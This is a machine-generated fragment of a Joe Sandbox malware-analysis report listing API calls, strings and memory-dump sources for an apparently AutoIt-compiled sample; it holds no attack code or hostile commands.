                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 2496851823-2422070025
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DF3C26,00EB62F8,?,?,?), ref: 00E00ACE
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • _wcscat.LIBCMT ref: 00E350E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FullNamePath_memmove_wcscat
                                          • String ID: c
                                          • API String ID: 257928180-921687731
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E49355
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E4924D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E492D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: @R
                                          • API String ID: 3494438863-2347139750
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E481CA
                                            • Part of subcall function 00E13598: _doexit.LIBCMT ref: 00E135A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          APIs
                                            • Part of subcall function 00E2B564: _memset.LIBCMT ref: 00E2B571
                                            • Part of subcall function 00E10B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E2B540,?,?,?,00DF100A), ref: 00E10B89
                                          • IsDebuggerPresent.KERNEL32(?,?,?,00DF100A), ref: 00E2B544
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DF100A), ref: 00E2B553
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E2B54E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599